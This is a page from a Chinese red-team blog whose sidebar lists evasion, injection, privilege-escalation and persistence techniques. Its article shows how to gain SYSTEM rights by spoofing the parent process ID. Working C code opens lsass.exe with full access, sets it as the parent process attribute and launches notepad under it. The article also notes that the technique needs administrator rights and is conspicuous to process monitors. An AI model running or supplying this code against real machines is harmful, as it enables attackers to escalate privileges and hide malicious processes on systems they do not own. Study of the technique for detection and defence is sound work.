idiotc4t's blog
搜索文档…
idiotc4t's blog
关于这个博客
武器设计
我也不知道能不能写
C2手稿
先占个位置
武器化
COM组件相关的武器化开发技术
攻击demo的bof改造
Go项目反射改造
VulnBins的利用 (vuln driver)
红队研究
NtQueryInformationProcess逆向
NetUserAdd逆向
应急响应
WannaMine4.0专杀的一些技巧
防御逃避
ReflectiveDLLInjection变形应用
Execute-Assembly实现
ShadowMove复现与思考
载入第二个Ntdll绕Hook
编译时混淆字符串&函数调用
基于线程结束的EventLog绕过
动态获取系统调用(syscall)号
基于内存补丁的AMSI绕过
基于API Hook和DLL注入的AMSI绕过
基于内存补丁ETW的绕过
基于断链的DLL隐藏
基于HEX字符串执行的AV绕过
CobaltStrike Argue命令实现
简单的分离免杀
伪装PPID规避检测
伪装命令行规避检测
通过重写ring3 API函数实现免杀
动态调用无导入表编译
基于Registry的虚拟机检测
利用杀毒软件删除任意文件
反转字符串绕杀软
重新加载.text节拖钩
x64转换层&跨位数进程注入
代码与进程注入
Divide and Conquer
Clipboard Data Deliver
.NET Reflective Injection
APC Thread Hijack
CreateRemoteThread
APC Injection
Mapping Injection
Bypass Session 0 Injection
WhiteFile Offset Table Generate Shellcode
Early Bird
Early Bird & CreateRemoteThread
TLS Code Execute
SEH Code Execute
APC & NtTestAlert Code Execute
NtCreateSection & NtMapViewOfSection Code Execute
Process Hollowing
SetContext Hijack Thread
DLL Hollowing
权限提升
基于注册表劫持BypassUAC
基于dll劫持BypassUac
通过com组件BypassUAC
通过复制Token提权到SYSTEM
通过code&dll注入提权到SYSTEM
通过伪装PPID提权到SYSTEM
通过系统服务提权到SYSTEM
权限维持
主机特征绑定木马
寻找有价值的文件
获取机器安装的软件
通过API添加Windows用户
Detours InLine Hook
DLL劫持
RID劫持
自启动服务
编写简单远控
注册表自启动项
GitBook 提供支持
通过伪装PPID提权到SYSTEM
PPID-Priv

简介

在指定父进程句柄的时候,子进程同时也会继承父进程的权限,这样的话我们也可以通过伪装PPID的方式进行提权,但是这样的技术会有一个较大的缺陷,如果使用process explorer等进程监控软件查看的话会显示在系统权限的进程下派生出了一个子进程,这样会有较大的特征,更容易会被发现,当然也可以通过其他技术手段进行为伪装。
ps:需要管理员权限

代码实现

1
STARTUPINFOEX sie = { sizeof(sie) };
2
PROCESS_INFORMATION pi;
3
SIZE_T cbAttributeListSize = 0;
4
PPROC_THREAD_ATTRIBUTE_LIST pAttributeList = NULL;
5
HANDLE hParentProcess = NULL;
6
DWORD dwPid = 0;
7
8
dwPid = FindProcessPID(L"lsass.exe");
9
10
InitializeProcThreadAttributeList(NULL, 1, 0, &cbAttributeListSize);
11
pAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, cbAttributeListSize);
12
InitializeProcThreadAttributeList(pAttributeList, 1, 0, &cbAttributeListSize);
13
hParentProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
14
UpdateProcThreadAttribute(pAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParentProcess, sizeof(HANDLE), NULL, NULL);
15
16
sie.lpAttributeList = pAttributeList;
17
CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, (LPSTARTUPINFOA)&sie.StartupInfo, &pi);
18
19
DeleteProcThreadAttributeList(pAttributeList);
20
CloseHandle(hParentProcess);
Copied!

LINKS

Programming reference for the Win32 API - Win32 apps
docsmsft
权限提升 - 以前
通过code&dll注入提权到SYSTEM
下一个 - 权限提升
通过系统服务提权到SYSTEM
最近更新 1yr ago
复制链接
内容
简介
代码实现
LINKS